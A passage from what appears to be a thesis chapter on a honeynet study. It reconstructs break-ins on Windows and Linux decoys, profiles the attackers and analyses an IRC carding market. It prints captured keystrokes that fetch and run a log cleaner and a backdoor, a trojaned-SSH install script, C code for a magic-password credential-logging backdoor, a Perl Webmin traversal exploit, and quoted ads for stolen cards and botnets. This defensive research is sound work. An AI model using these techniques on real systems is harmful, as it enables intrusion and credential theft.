pubstro in short), i.e., a compromised high-capacity public server that is misused to distribute illegal copies of copyright-protected goods (see “BBstf” Smith, 2004, p. 29). In many cases, such a pubstro is integrated into a larger network of similarly penetrated systems and is run by participants of a special Internet subgroup which is known as the warez scene (see Sen and Krömer, 2008; Craig and Burnett, 2005). For this reason, it is beneficial to analyze the incident not only with regard to the intruder, but also with respect to said subgroup. Thereby, we can possibly assess the intentions and motives of the adversary more accurately and create a more detailed profile of her personality. 5.3.1.3 Profile of the Attacker Based on the pieces of evidence we collected on the compromised decoy, we are able to draw conclusions about the presumable origin and technical expertise of the attacker. Especially an evaluation of the latter characteristics can greatly facilitate a broad classification of the intruder (cmp. Rogers, 2000a; Hollinger, 1988). For a more reasonable taxonomy, however, we need to take motivation-related factors into account as well (cmp. Chantler, 1995; Rogers, 2005). These factors can be grouped into six categories that are outlined in the second half of this section. Presumable origin of the attacker: Surprisingly, only two systems are used by the blackhat during the intrusion to gain access to our honeypot. The respective hosts with 27 Note: This is a jargon word for “filler”. Substituting letters for numbers is common in certain subgroups of the Internet community and known as leetspeak. For more information, please refer to Raymond (2003). 28 Note: This is a figurative translation of the greeting message of the captured login banner. 121 5 Implementation, Deployment, and Analysis of a Honeynet the IP addresses 87.230.xxx.xxx and 85.176.xxx.xxx are traced to two different German Internet service providers (ISPs). A number of further indices also signify that the intruder is likely to originate from Germany. For instance, both the greeting message that is displayed when logging in to the Serv-U FTP server as well as several passwords that we intercepted at the beginning of a FTP session are composed in German. The user-agent strings that are transmitted by the attacking machine to our decoy each time a web site is retrieved contain the German country code as shown in the extract of a captured network packet below. Mozilla /5.0 ( Windows ; U ; Windows NT 5.1; de ; rv :1.8.1.12) Gecko /20080201 Firefox /2.0.0.12 As can be seen, we are also able to identify the system platform of the adversary by analyzing the different sections of the string (see also Mozilla Developer Center, 2009; Microsoft Corporation, 2009, for an overview about the sections of the user-agent string). In our case, the intruder uses a Microsoft Windows operating system and a recent version of the Mozilla Firefox Internet browser. It is important to note though that these pieces of information are under entire control of the client and, thus, may possibly be tampered with (see Andrews and Whittaker, 2006). Additionally, the individual IP addresses that are recorded during the incident do not necessarily reflect the real origins of the attack either. As many authors point out, attackers frequently abuse intermediary machines, so-called proxies, to cover their tracks and circumvent prosecution (cmp. Honeynet Project, 2004b). Therefore, each source of data must generally be regarded with great care. By combining and linking the captured elements, however, we are able to draw a more complete picture and find a solid foundation for our hypothesis. Presumable expertise of the attacker: Within a period of slightly more than 15 minutes, the blackhat exploits a vulnerability in one of our applications, penetrates the machine, and sets up her own FTP server. Taking these step-by-step actions into account, we conclude the intrusion has been well planned and prepared for. Furthermore, given that the adversary is familiar with a number of attack tools and is quickly able to upload a customized login banner, we have reason to believe she has already gained a certain experience with similar system compromises. On the other hand, she does not seem to fully understand the complexity of specific utilities, most importantly, the rootkit that is installed on our decoy but which is quite poorly configured (cmp. Section 5.3.1.1). Some operations are also carried out repetitively, e.g., the Serv-U daemon is added multiple times to the exception list of the local firewall rules. It also remains unclear why two variants of the same trojan backdoor are transferred to our honeypot. In summary, even though the strategy and methods of the intruder are fairly efficient, we assume her technical expertise and skills are only rather low. Presumable motivations of the attacker: As members of the Honeynet Project (2004b) note, identifying the motivations of attackers is key to gaining a deep understanding 122 5 Implementation, Deployment, and Analysis of a Honeynet of their behavior. In turn, by observing the activities of intruders, we are able to draw conclusions about their intentions and reveal inherent factors such as motives and attitudes (see Fishbein and Ajzen, 1975; Ajzen, 1991, for an overview about the interrelation between motivations, attitudes, and behavior). With respect to computer crime, the social psychologist Max Kilger differentiates the following six prevalent motivations that are subsumed under the acronym MEECES (see Honeynet Project, 2004b, p. 509-520): money, entertainment, ego, cause (i.e., ideology), entrance to social group, and status. After examining the sequence of the attack, we did not find any evidence the incident was monetary- or ideology-driven. Furthermore, considering the adversary attempted to “keep a low profile” and made significant efforts to stay in control of the machine, we feel the compromise was not carried out purely for entertainment purposes. On the other hand, the fact that a personal logo was uploaded to our honeypot and the system was being made available to multiple users indicate a certain desire for appreciation and the need to rise in esteem as well as status. This observation is supported by Rogers (2000b, p. 19): “The reinforcement derived from hacking may come from the increase in knowledge, prestige within the hacking community, or the successful completion of the puzzle (...)”. Consistently, Jordan and Taylor (1998, p. 768) argue that “peer recognition from other hackers or friends is a reward and goal for many hackers, signifying acceptance into the community and offering places in a hierarchy of more advanced hackers”. To sum up, ego-, social-, and status-related elements apparently were the dominant motivational drivers for the blackhat to penetrate our decoy, rather than monetary or ideological factors. 5.3.1.4 Taxonomy and Classification of the Attacker A number of authors emphasize that “hackers” do not form a homogeneous group, e.g., because of different social, personal, or technical backgrounds (cmp. Rogers, 2000b; Chantler, 1995). Therefore, various attempts have been made in the literature to divide computer criminals into meaningful categories (cmp. Hollinger, 1988; Cross and Shinder, 2008). This categorization is a “necessary first step toward understanding these individuals” (see Rogers, 2001, p. 48). To a great extent, however, the results of these researches are quite dated at the time of this writing, mainly qualitative in nature, and cannot be regarded as entirely representative (cmp. Rogers, 2001, p. 47-61). As Rogers (2005, p. 2) concludes, “even with the current increase in computer crime rates, there has been a lack of empirical studies based on a solid scientific method in this area”. For this reason, he proposes a new, two dimensional framework and distinguishes 8 types of attackers in dependence of their skills and motivation. In compliance with this model, the intruder we monitored can be classified as a novice or cyber-punk. These individuals are described as technically less competent and strongly rely on pre-compiled toolkits in order to successfully penetrate a system. Their motivation primarily results from the rise in ego they feel when a machine is compromised as 123 5 Implementation, Deployment, and Analysis of a Honeynet well as the wish to be accepted as a legitimate part of the hacker subculture. Similar observations are also reported by participants of the Hacker’s Profiling Project (HPP)29 , an international research group that strives to create empirically-valid profiles for computer crimes (see also Chiesa et al., 2009). According to their experiences, these types of blackhats are typically organized within some kind of group and scan the Internet for specific vulnerabilities. Once a vulnerability is found, the respective computer is exploited with the help of tools and simple scripts and is used for the purposes of the adversary. 5.3.2 Attack on the Linux Honeypot Our Fedora-based Linux honeypot was compromised after having been online for about six weeks. The sequence of the intrusion is illustrated in the following section. Similar to the attack presented in the previous section, we conclude with a short evaluation of the incidents and briefly outline the alleged motives and characteristics of the intruder. 5.3.2.1 Sequence of the Attack In the early morning of April 16, at 03:42:42 a.m., the monitoring devices of our Honeywall detect the beginning of an automated password brute force attack. The probes originate from a machine with the IP address 192.104.xxx.xxx and target the secure shell server of our Fedora-based Linux honeypot. Within a period of less than 25 minutes, the weakly-protected root superuser account is compromised, and valid authentication credentials are found. More than two hours later, at 6:15:46 a.m., an adversary initiates an encrypted connection from the IP address 85.18.xxx.xxx and logs in for the first time. Although the network channel is secured, we are able to accurately reconstruct the activities of the intruder with the help of Sebek that is running on our decoy. An extract of the captured keystrokes is shown in Listing 5.8. The individual steps of the attacker are described in more detail below. First, the blackhat disables the history functionality of the shell. The shell history is a standard feature of the bash command interpreter and keeps track of all instructions that are typed in over the system console for the convenience of the user (cmp. GNU Free Software Foundation, 2009). Its behavior is controlled by several environment variables. For instance, the variable HISTFILE defines the name of the file the history is written to. If this variable is “unset” (cmp. Line 1 of Listing 5.8), the logging mechanism of the shell is turned off, and commands are not persistently saved any longer (cmp. Ithilgore, 2008). To make sure the operation is carried out successfully, the attacker is careful to delete potential aliases of the variable such as HISTSAVE or HISTLOG as well. 29 see http://hpp.recursiva.org/en/index.php 124 5 Implementation, Deployment, and Analysis of a Honeynet 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 [06:16:10] unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG USERHST REMOTEHOST REMOTEUSER ; wget <... >/ m . tar . gz ; tar - xzvf m . tar . gz ; [06:16:12] rm - rf m . tar . gz ; chmod + x m ; ./ m -u root -n 1; rm - rf m [06:16:14] w [06:16:51] wget <... >/ backdoor ; tar zxvf backdoor ; rm - rf backdoor ; cd . ssh ; [06:18:12] ./ install [06:24:59] w [06:25:25] wget <... >/ scan / scanner2 ; tar zxvf scanner2 ; rm - rf scanner2 ; cd scan ;./ go . sh 71 [06:25:31] cd .. [06:25:37] rm - rf . ssh [06:25:49] w [06:26:05] rm - rf scan [06:26:44] w [06:26:46] uname -a [06:26:54] / sbin / ifconfig Listing 5.8: Extract of Keystrokes Captured by Sebek In the next step, the adversary starts downloading a compressed archive from a public Internet domain30 . This archive contains a single binary m which is identified as the MIG Logcleaner31 , version 2.0. As the name suggests, the program is capable of erasing specific entries in the main Linux log files /var/log/utmp, /var/log/wtmp/, and /var/log/lastlog. At 06:16:11 a.m., the application is invoked with the parameters -u root and -n 1 (cmp. Line 4 of Listing 5.8) to remove all traces of the unauthorized superuser access. In addition to the log cleaner, the intruder also retrieves two archives from a private website with the IP address 209.63.xxx.xxx (see Line 7 and Line 11). The first archive contains a manipulated version of a secure shell server and is extracted to the hidden directory .ssh. At 06:18:12 a.m., the server is compiled and set up with a custom installation script that is displayed in Listing 5.9. Thereby, our own service on the machine is replaced. What is more interesting, the syslog daemon of the operating system is temporarily shut down during this process to prevent suspicious records of these activities in the log files. The file dm.h that is referenced in the installation script is not part of the original SSH software. After a short examination of the respective source code, we discover a secret trojan backdoor. The algorithm for this backdoor is outlined in Listing 5.10. As can be seen on Line 6, the verification routine of the service is completely circumvented in case 30 Note: The Internet address of the domain has been sanitized to protect the privacy of the involved parties. 31 see http://pc-freak.eu/sploits/info/download.txt 125 5 Implementation, Deployment, and Analysis of a Honeynet 1 #! / b i n / s h 2 3 4 # edit the configuration pico dm . h file of the trojaned service 5 6 7 # c o n f i g u r e , c o m p i l e , and i n s t a l l t h e t r o j a n e d s e r v i c e ... 8 9 10 11 # o v e r w r i t e t h e o r i g i n a l daemon cp -f ./ sshd / usr / sbin / sshd cp -f ./ sshd / usr / local / sbin / sshd 12 13 14 15 16 17 # s t o p t h e o r i g i n a l i n s t a n c e o f t h e s e r v i c e and s t a r t t h e t r o j a n kill -9 ‘ cat / var / run / sshd . pid ‘ / sbin / service syslog stop / usr / sbin / sshd / sbin / service syslog start Listing 5.9: Setup Script of a Trojaned Secure Shell Server 1 2 int sys_auth_passwd ( Authctxt * authctxt , const char * password ) { ... 3 // g r a n t a c c e s s a t a l l t i m e s i f t h e magic p a s s w o r d i s e n t e r e d if (( strcmp ( password , MAGIC_PASS ) ) == 0) { dm = 1; return 1; } else { dm = 0; 4 5 6 7 8 9 10 11 // l o g a u t h e n t i c a t i o n c r e d e n t i a l s fd = fopen ( LOGFILE , " a " ) ; fprintf ( fd , " % s :% s \ n " , authctxt - > user , password ) ; fclose ( fd ) ; 12 13 14 15 16 // c h e c k w h e t h e r t h e u s e r h a s e n t e r e d a c o r r e c t p a s s w o r d return ( strcmp ( encrypted_password , pw_password ) == 0) ; 17 18 } 19 20 } Listing 5.10: Backdoor Mechanism Implemented in the Secure Shell Server 126 5 Implementation, Deployment, and Analysis of a Honeynet a magic password is entered. Consequently, access to the system may be maintained even if the intrusion is detected and the superuser password is changed at a later point of time. On the other hand, if a legitimate user tries to log in, her credentials are transparently written to a special log file that is controlled by the attacker, before the original password checking function is called (see Line 15 and Line 20). These pieces of information can possibly be used to attack further machines on the network. The second archive that is downloaded from the private website contains a network scanner and a simple password brute force utility. These tools are coordinated by a small auxiliary script. It is executed at 06:25:25 a.m. in order to probe an entire class A network for vulnerable systems (cmp. Line 12 of Listing 5.8). However, these outbound connections are blocked by our Honeywall to mitigate risks as best as possible. Before logging out, the adversary covers her tracks and deletes all files that have been transferred to the honeypot during the intrusion. Furthermore, she briefly runs the uname command to obtain basic information about the operating system and checks the configuration of the network interface cards. At 06:27:08 a.m., the connection is closed. April 17 The attacker returns on the following day at 06:45:14 p.m. In contrast to the preceding session, the blackhat does not clean the log files but solely invokes the w command to verify no other users are currently logged in on the machine. In the next step, the psyBNC32 IRC bouncer is retrieved from a private website and saved to a newly-created hidden directory. An IRC bouncer acts as an intermediary between an IRC (Internet Relay Channel) server and a corresponding client. Thereby, it is, for instance, possible to maintain a connection with a certain communication channel, even if the client exits at a specific point of time (cmp. Jestrix, 2003). As we will see later, this characteristic is extremely beneficial to the intruder. Before the application is executed, the adversary manipulates the IPTables packet filtering software and adds a new rule: / sbin / iptables -I INPUT -p tcp -- dport 8080 -j ACCEPT According to this rule, incoming TCP requests that are destined for port 8080 are to be accepted. It is required by the bouncer to properly process inbound traffic. At 06:46:22 p.m., psyBNC is finally run and starts working. In order to appear as inconspicuous as possible, the main executable has been renamed to httpd and, thus, is disguised as an instance of the httpd web server. 32 see http://www.psybnc.at/ 127 5 Implementation, Deployment, and Analysis of a Honeynet April 18 On April 18, a new encrypted network session is established with our decoy at 09:17:14 in the morning. The intruder quickly checks the list of users that are currently logged in and begins to download a compressed archive from a web server with the IP address 85.204.xxx.xxx. The archive contains multiple tools and scripts that can be used to scan hosts for instances of the Webmin33 and Usermin34 web applications. These applications provide graphical interfaces for basic administrative tasks (see Cameron, 2003). Versions prior to 1.290 and 1.220, respectively, do not properly sanitize user-specific input. Thereby, attackers are able to access arbitrary files on the system of the victim (see SecurityFocus, 2006d; CVE, 2006a). These security weaknesses may be automatically exploited with a number of utilities that are included in the archive as well. To make the procedure as easy as possible, a small helper script coordinates the interactions between the different components. A flowchart of the activities is displayed in Figure 5.24. To initiate the attack sequence, an adversary simply needs to invoke the script go with the address of a class B network. This information is passed to ss, a simple network scanner that is identified as the Fast SYN Scanner by DrBIOS35 . The program sends two TCP synchronize (SYN) packets to each machine within the selected network range, more precisely, to the system ports 10,000 and 20,000 the Webmin and Usermin web applications listen on (see Cameron, 2003). If a packet is acknowledged, an active service has been found, and the IP address of the host is logged. At the end of the operation, the generated log file is processed by the scripts start, do, and mycnf that check whether systems in the selected network segment are affected by the vulnerability. If this is the case, the individual servers are attacked for the first time, and the /etc/passwd file of the victim is retrieved in order to extract the list of valid system users. For this purpose, a small Perl program a.pl must be executed. It stores the actual exploit code that is illustrated in Listing 5.11. The malicious directory traversal technique shown in Line 6 and 9 of Listing 5.11 is used during a second attack to disclose further resources, including the /etc/shadow file that saves hashes of the system passwords, various configuration files, and the command histories of the users. In the last step, the captured shadow file is read in by john, a popular password cracking program36 , to start a brute force or dictionary attack on the encrypted authentication credentials. If this attack succeeds, control over additional machines may be gained. For this reason, the adversary intends to probe both a single system with the IP address 65.165.xxx.xxx as well as an entire network of a Belgian Internet service provider. However, even though all utilities described above are fully functional, these attempts remain unsuccessful, because the intruder fails to replace a hard-coded name 33 see see 35 see 36 see 34 http://www.webmin.com/ http://www.webmin.com/usermin.html http://www.securiteam.com/tools/5EP0B0ADFO.html http://www.openwall.com/john/ 128 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.24: Flowchart Diagram of the Captured Attack Tools 129 5 Implementation, Deployment, and Analysis of a Honeynet 1 #! / u s r / b i n / p e r l 2 3 4 5 6 7 8 9 10 ... # generate a s e r i e s of . . / i n s t r u c t i o n s to break out of the root # d i r e c t o r y o f t h e web s e r v e r $temp = " /..%01 " x 80; ... # e x p l o i t the f i l e disclosure v u l n e r a b i l i t y my $url = " http :// " . $target . " : " . $port . " / unauthenticated / " . $temp . $filename ; 11 12 13 # retrieve the f i l e $content = get $url ; Listing 5.11: Exploit for the Webmin and Usermin Web Applications for the network interface card (eth1) with the correct, system-specific value (eth0). As a result, the scanning process is aborted, and no outbound connections are established. Being obviously dissatisfied with the results, the blackhat deletes the complete toolkit and logs out at 09:27:21 a.m. About two hours later, at 11:16:01 a.m., the attacker returns and downloads an archive with the eggdrop software37 from a FTP server with the IP address 58.254.xxx.xxx. Eggdrop provides numerous so-called bot functions for an IRC server. It is, for instance, capable of automatically monitoring specific communication channels and serving requests (cmp. Pointer, 1997). After extracting the program into the home directory of a non-privileged user, the intruder retrieves a required static library and briefly edits several configuration files. At 11:30:56 a.m., the bot is executed and joins the IRC network. With the help of psyBNC that is installed on our honeypot, the adversary is able to reconfigure the eggdrop application at all times. Furthermore, when participating in an IRC communication channel, solely the IP address of our machine is revealed (cmp. Jestrix, 2003). Thus, the real identity of the attacker may be effectively concealed. On the other hand, due to the devices running on our Honeywall, we are also able to monitor a great part of the activities the blackhat is involved in. An analysis of these activities is subject of Section 5.4, an evaluation of the attack as well as a description of the alleged motives and characteristics of the intruder are presented below. 5.3.2.2 Evaluation of the Attack The adversary launches an automated password brute force attack on our honeypot and succeeds in compromising the weakly protected root superuser account of the operating system. After logging in and carefully covering her traces, the intruder retrieves several 37 see http://www.eggheads.org/ 130 5 Implementation, Deployment, and Analysis of a Honeynet archives from different servers on the Internet. These archives comprise a trojaned version of a SSH server that is installed on our decoy to secretly record usernames and passwords, a network scanner, and multiple attack tools and scripts. Although the blackhat attempts to probe several external networks, the respective systems are not put at risk at any time due to the protection mechanisms of our Honeywall. However, the attacker manages to set up a bouncer software as well as a so-called bot for the IRC network on our machine. As we will see in Section 5.4, these programs help the blackhat administrate a covert communication channel and participate in some type of underground economy. A brief description of the individual files and archives we have captured during the intrusion can be found in Table 5.9, an overview about the entire incident is given in Figure 5.25. Attack Tool m backdoor ss MD5 Checksum Description Log cleaning utility MIG Logcleaner 2.0 that is used by the adversary 9b0e266c08e8983f0c3e42a12bece88c to manipulate the system log files and cover the traces of the intrusion. Trojaned version of the secure shell server. After the service is installed on the honeypot, the adversary may grant access to the system by entering df192b169644892a7d85064d9c5b2f41 a magic password. Additionally, the authentication credentials of legitimate users are transparently written to a secret file when logging in. Network scanner DrBIOS Fast SYN Scanner. The tool is capable of probb51a52c9c82bb4401659b4c17c60f89f ing system ports of a large number of systems within a short amount of time. Table continues on the following page. 131 5 Implementation, Deployment, and Analysis of a Honeynet Compressed archive that contains the source code files of the psybnc IRC bouncer. With the help of the bouncer, the adverpsybnc 54a6d04d4605f251d4caf6dc76af39d0 sary is able to join communication channels on the IRC network without revealing her real IP address and identity. Archive that stores 14 attack tools and scripts to probe servers for vulnerable instances of the Webmin or Usermin web applications. In case a security weakness is olinie.tar.gz a5712fbed957d4ae9d0c6cdd93ec4d7b found, the respective machines are automatically exploited, and sensitive information such as usernames and passwords are transferred to the attacking host. Source code archive of the eggdrop bot software. The program proeggdrop 99c1b3bdf7297e764030aeadfb05b1df vides various automatic monitoring and administrative functions for IRC communication channels. Table 5.9: Attack Tools Used During the Compromise of the Linux Honeypot 132 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.25: Timeline of the Attack on the Linux Honeypot 133 5 Implementation, Deployment, and Analysis of a Honeynet 5.3.2.3 Profile of the Attacker Similar to the attack on our Windows honeypot, we attempt to create a basic profile of the adversary based on the pieces of evidence we collected and draw conclusions about her origin, her technical expertise, and her motivations. A more detailed taxonomy and classification of the intruder is subject of Section 5.3.2.4. Presumable origin of the attacker: In sum, six systems are involved in the incident that are scattered over three continents: The password brute force attacks are traced to a server in North America. On the other hand, all encrypted connections are initiated from a computer located in Italy. Last but not least, the additional software applications and archives that are downloaded to our decoy during the intrusion are stored on four different machines in the United States, China, and Romania. Taking these aspects into consideration, we have reason to believe the blackhat intentionally obscures the source of her attack. Thus, the geographical location of a host does not necessarily imply the real origin of the intruder. However, after a more in-depth investigation of the compromise, we find two indices the adversary is Romanian or of Romanian descent: First, a great part of the attack tools and scripts that are transferred to our honeypot contain Romanian messages and instructions.38 Second, the attacker joins several private communication channels on the IRC network and chats in Romanian before finally joining an English-speaking underground market (see Section 5.4). Presumable expertise of the attacker: On the one hand, the adversary appears to have a certain experience with Linux-based intrusions. With the help of multiple pre-packaged archives, our decoy gets quickly penetrated and under full control of the blackhat. She makes also sure to cover her traces and restrains most of her stays to short periods of less than 15 minutes. On the other hand, the intruder is unable to properly operate some of the attack tools that are downloaded to our machine and fails to specify correct program variables. As a consequence, several attempts to probe external networks for vulnerabilities repetitively go amiss. Moreover, processes that are executed on the system are not effectively hidden from administrators or other maintenance personnel, e.g., by installing a rootkit as has been done in the compromise of the Windows-based honeypot. That is why we presume the technical expertise of the attacker is quite limited and restricted to a number of step-by-step activities. Presumable motivations of the attacker: With the help of the MEECES model that we have briefly introduced in Section 5.3.1.3, we attempt to identify the prevalent motivations of the adversary that eventually led to the incident. In contrast to the attack on our Windows-based honeypot, we did not find any evidence the intrusion was ego- or sociologically-driven, i.e., the compromise was neither carried out solely for confidence-related reasons, nor for gaining entrance to a social group or enhancing status. Additionally, we did not find any messages, logos, or other types of personal statements that indicate a political or ideologic motivation. Given the intruder made sure to cover her traces, subverted a system daemon, and systematically tried to 38 Thanks to Viviana Nichica for translating the messages. 134 5 Implementation, Deployment, and Analysis of a Honeynet probe external network segments for vulnerabilities, we believe the attack has a serious intention and must not be regarded as purely playful, i.e., for entertainment purposes. In fact, our system acts as an intermediary for joining a covert communication channel. As we will see in Section 5.4, various hacking-related goods and services such as stolen credit cards or access to compromised online accounts are advertised for sale in this channel. For this reason, we conclude the attacker strives for taking monetary advantages from the intrusion in the end. 5.3.2.4 Taxonomy and Classification of the Attacker Based on the technical expertise and the motivational drivers we have identified in the previous section, we attempt to categorize the attacker in compliance with the twodimensional taxonomy framework developed by Rogers (2005) (cmp. Section 5.3.1.4). As we have outlined, a meaningful and empirically valid classification helps “arrive at some type of understanding about the motivation of individuals engaged in hacking” and overcome the hurdles researchers face when studying miscreants (see Rogers, 2000a, p. 1-2). According to the framework, we classify the intruder we have observed as a petty thief. As Rogers (2005, p. 4) points out, these types of computer criminals are motivated by financial gain and greed. They “learn the prerequisite skills necessary to perpetrate the crime”, as ”the successful use of technology is crucial in order for them to fulfill their need for money”. Due to these characteristics, petty thieves may become skilled over time even if they appear to be technically less proficient at first and, thus, represent a serious threat (cmp. Liu and Cheng, 2009). 5.4 Analysis of an Underground Communication Channel As we have outlined in the previous section, an adversary managed to set up a so-called bouncer and an IRC bot after successfully breaking in our Fedora-based Linux honeypot. With the help of these applications, the intruder was able to uphold a permanent connection with the Internet Relay Chat network as well as automatically perform certain administrative tasks within a specific underground communication channel. These tasks included generating access rules for other channel members and providing basic usage statistics. In cooperation with two additional bots that were already residing in the channel, the attacker could thus effectively stay in control over the room. With the help of the Honeywall, we were able to monitor a great part of the activities over a period of about 10 weeks, from April 20, 2008 to June 30, 2008, and revealed some form of underground market for hacking-related goods and services. An overview about this market and its participants is presented in the following section. 135 5 Implementation, Deployment, and Analysis of a Honeynet 5.4.1 Overview about the Captured Data During the observation period, we recorded more than 676,000 messages that were publicly exchanged between the different channel members. As shown in Figure 5.26, the number of messages sent per day varied from about 2,700 on April 25 to more than 21,000 on May 22. On an average day, we monitored slightly less than 12,000 messages. Equally, the number of active users in the channel as identified by their unique nickname (“nick”) differed between 18 on April 27 and 79 on May 10 (see Figure 5.27). On average, 49 users were logged on on any given day and posted at least one message. Figure 5.26: Number of Messages Sent per Day to the Communication Channel To a high degree, the respective messages were repetitively sent to the channel. In many cases, for instance, automated scripts and programs periodically retransmitted specific, pre-defined lines of text. For this reason, we were able to reduce the total text corpora to a comparatively small set of 4,165 unique messages, ordered by their frequency. To assess the recorded communication more accurately, we manually categorized and labeled 10% (417) of the most frequent messages in the next step. Due to the characteristics of the frequency distribution of the text corpora, these messages covered 84.5% of all captured posts. The results of our analysis are outlined in the next section. 136 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.27: Number of Active Users per Day in the Communication Channel 5.4.2 Analysis of the Labeled Data The 417 chosen messages were identified as either advertisements for various hackingrelated goods and services, corresponding requests, or both. As indicated in Figure 5.28, offers comprised about three quarters of the data set and outnumbered requests almost five to one. In order to thoroughly classify the different samples, we assigned each message to one or more non-mutually distinctive categories that can be seen in Figure 5.29. For instance, the message shown in Listing 5.12 advertises both stolen credit cards as well as access to hacked online accounts and, thus, is assigned to two categories. In the following, we analyze the labeled data in more detail and illustrate the individual categories with the help of selected examples. 1 2 3 4 " Selling EU Dumps + Pin [ track1 / track2 ] || Paypal accounts with good balance [ verified / unverified ] || (...) Dont waste my time or i will ignore you || For Deal ICQ : <xxx >" Listing 5.12: Sample Advertisement for Hacking-Related Goods 137 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.28: Distribution of Offers and Requests for Hacking-Related Goods and Services Figure 5.29: Types of Hacking-Related Goods and Services 138 5 Implementation, Deployment, and Analysis of a Honeynet 5.4.2.1 Credit Card-Related Offers and Requests In almost 4 out of 10 cases, adversaries posted advertisements for stolen credit cards and credit card-related information. As McCarty (2003, p. 91) points out, the data may either come from computer intrusions or be physically provided by morally questionable personnel working at local banks, hotels, or restaurants. In the course of our analysis, we have made similar observations. Oftentimes, the information included both the personal identification number (PIN) of the victim as well as her card verification value (CVV2). The latter is a three-digit identification code that is frequently used for verifying the legitimacy of a credit card during online transactions (cmp. Visa Inc., 2002). Two typical messages for such offers that we have captured during the observation period are shown in the first two lines of Listing 5.13. As can be seen with the second example, a blackhat advertises 30 newly acquired (“fresh”) credit cards (“CCz”) for $200. In contrast, we did find corresponding requests in only 13.25% of the selected data set. Two representative sample messages are displayed in the second half of Listing 5.13. 1 2 " Selling valid fresh unused Mastercards / Visa / American Express (...) " " Selling Fresh France CCz With Cvv2 (...) 30 ccz = 200 $ (...) " 3 4 5 " Buying all valid cc ’ s Visa or Mastercard 7 $ Each ! (...) " " I need cvv2 From Italy , Who have privat me (...) " Listing 5.13: Sample Advertisements and Requests for Stolen Credit Cards and Credit Card-Related Information 5.4.2.2 Cash Out-Related Offers and Requests As Thomas and Martin (2006) argue, one of the biggest challenges of the Internet miscreants is to safely cash the illegally obtained funds while mitigating the risk of getting caught by law enforcement authorities at the same time. For this reason, blackhats frequently cooperate with so-called cashiers, i.e., brokers who are willing to clean out bank accounts of the victims. For a pre-defined, fixed fee, e.g., 50% of the total amount, the cashier transfers the money directly to the adversary, typically within hours, by using online or offline services as offered by Western Union (WU)39 or E-Gold40 (see also Franklin and Paxson, 2007). In many cases, additional third parties, so-called confirmers, are involved in this process as well and verify incoming payments. Alternatively, the money may also be moved to a drop, an intermediary domestic or offshore account, that helps impede prosecution but facilitates money laundering (cmp. Thomas and Martin, 2006, p. 11-12). A summary of common advertisements and requests for cashiers, confirmers, and drops can be found in Listing 5.14. 39 40 see http://www.westernunion.com/ see http://www.e-gold.com/ 139 5 Implementation, Deployment, and Analysis of a Honeynet 1 2 3 4 " Cashout USA Visa FULL INFO ! = 50:50% SHARE ! Legit Chaser ! (...) " " CASHING OUT MONEYBOOKERS ACCOUNT . (10.000 $ / DAILY ) " " Confirm Western Union ... PRV ME " " I Got Legit U . S . A Item Drop , Split 50/50" 5 6 7 8 9 " I am looking for someone in US that can cashout pins . (...) " " SPAMMER looking for some deals / trustable casheers . !!!" "I ’ m looking for a WU confirmer for long term business (...) " " Looking for a USA / Canada Drop , USA / Canada CVV Cashier (...) " Listing 5.14: Sample Advertisements and Requests for Cashiers, Confirmers, and Drops 5.4.2.3 Further Financial Account-Related Offers and Requests In addition to credit cards, their corresponding PINs, and CVVs, several other types of financial account-related information were frequently offered and requested in the underground communication channel we observed. For instance, in 12.75% of all cases, adversaries advertised online logins for various major national and international banks, e.g., HSBC, Halifax, the Bank of America (BOA), Chase, and Wells Fargo. Furthermore, blackhats frequently offered access to numerous compromised online accounts, most importantly to PayPal, an electronic money transfer service, and Amazon, the world’s leading Internet retailer (cmp. Brohan, 2009). On the other hand, with a share of 1.75% and 1%, respectively, requests for these goods and services were issued only marginally (see Figure 5.29). Two sample messages for each category are illustrated in Listing 5.15. 1 2 " Selling BOA for 20 $ Hurry , Only Few to sell , Accept e - gold " " Selling (...) ShopAdmins , Paypalz , Amazons ,(...) Accept WU !" 3 4 5 "( T ) rade for PayPal and some bank logins - (...) icq <xxx >" " BUYING ALL VERFIED PAYPALS E - GOLD / WEST UNION " Listing 5.15: Sample Advertisements and Requests for Bank Logins and Online Accounts 5.4.2.4 Hacking-Related Offers and Requests In almost one out of 7 messages of the sample data, adversaries offered hacked hosts for sale. These hosts may, for instance, serve as intermediaries for further attacks or to make tracing more difficult (cmp. Honeynet Project, 2004c). As indicated in Listing 5.16, blackhats periodically advertise larger numbers of penetrated systems in the form of botnets as well. In dependence of its size, a botnet may potentially cause severe havoc, e.g., when bringing down the network of a business competitor during a Distributed Denial of Service (DDos) attack (see Provos and Holz, 2007; Mirkovic and Reiher, 2004). Compromised machines may also be used for spamming or phishing campaigns. In the latter case, an attacker first sets up a so-called scam page that mimics the web 140 5 Implementation, Deployment, and Analysis of a Honeynet 1 2 "( S ) elling hacked roots : linux , freeBSD , sunOS ; hacked shells (...) " " Selling botnets / bots For Reasonable Prices .. / msg for Instant deals " 3 4 5 " I want to buy root ‘ s or remote desktop msg me payment via e - gold " " NEED REMOTE FROM USA - ADMINISTRATOR -> TRADE FOR ROOT URGENT !" 6 7 8 " I can host scampages ... / q < Nick > for details " " Selling Fresh 5 Million Email List For Spamming " 9 10 11 " I need Scam Page Designer !! Msg me now !!" " I am looking for a Spammer to be parteners !!!!" Listing 5.16: Sample Advertisements and Requests for Hacked Hosts site of a legitimate, trusted service provider. In the next step, unaware computer users are lured into visiting the fraudulent page, typically by sending specially crafted email messages (cmp Watson et al., 2005). The victims are then tricked into entering their online credentials or other sensitive information that are particularly interesting for Internet miscreants. In 8.75% of the samples, adversaries explicitly advertised these types of services, 9.5% of the labeled data contained spam-related offers. Except for spamming operations, corresponding requests were practically negligible. A number of selected messages that we have obtained in the channel are presented in the lower half of Listing 5.16. 5.4.2.5 Personal Information-Related Offers and Requests In addition to credit card-related information, adversaries frequently advertised so-called fulls, i.e., personal data that included the full address of the cardholder, her phone number as well as her email address. Sample records as the one shown in Listing 5.17 were periodically posted to the channel, possibly as a proof of possession or to stimulate demand. On the other hand, we measured corresponding requests in less than 1% of the labeled data, even though these pieces of information may facilitate any kind of identity theft (cmp. also McCarty, 2003). An overview about typical messages that we have captured during the observation period is given in Listing 5.18. 141 5 Implementation, Deployment, and Analysis of a Honeynet 1 2 3 4 5 6 7 8 9 10 Credit Card Number : CVV : Expiry Date : Name : 